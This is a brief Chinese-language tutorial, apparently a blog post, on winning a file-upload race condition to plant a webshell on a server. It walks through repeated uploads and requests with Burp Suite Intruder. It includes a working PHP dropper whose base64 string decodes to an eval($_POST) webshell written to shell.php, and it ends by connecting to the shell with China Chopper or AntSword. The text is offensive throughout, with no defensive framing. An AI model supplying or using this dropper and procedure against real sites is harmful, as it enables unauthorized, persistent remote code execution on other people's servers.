文件上传之条件竞争
我们上传文件要在保存文件后在他被删除之前访问到他,所以访问速度一定要快,使用burpsuite的intruder功能来重复访问和发送
文件上传之条件竞争
原理:先保存文件
查看文件是否符合条件
满足(保留文件并重命名)
不满足(删除文件)
我们上传文件要在保存文件后在他被删除之前访问到他,所以访问速度一定要快,使用burpsuite的intruder功能来重复访问和发送。
第一步、正常上传,查看文件保存目录
第二步、抓包,抓取上传木马的包,发送到intruder,重复发包。
木马要能生小马,这样我们访问木马(a.php),木马就会生下小马(shell.php),木马会被删除但是小马会被留下。
1 //PHP大马生小马 2 <?php 3 $a='PD9waHAgQGV2YWwoJF9QT1NUWydhJ10pOz8+'; 4 $myfile = fopen("shell.php", "w"); 5 fwrite($myfile, base64_decode($a)); 6 fclose($myfile); 7 ?>
第三步、再去抓取访问木马(a.php)的包,发送到intruder
第四步、重复发送和访问,知道木马生成小马(访问状态200)
打开intruder,攻击类型选择Sniper,清除符号(我这个是汉化版的,英文版的跟这对应)
另一个也是如此
第五步、开始重复访问,开始重复发送,先开始访问,再开始发送
发现有200状态,说明木马已经生成小马
第六步、进行连接用中国菜刀或者中国蚁剑都可以
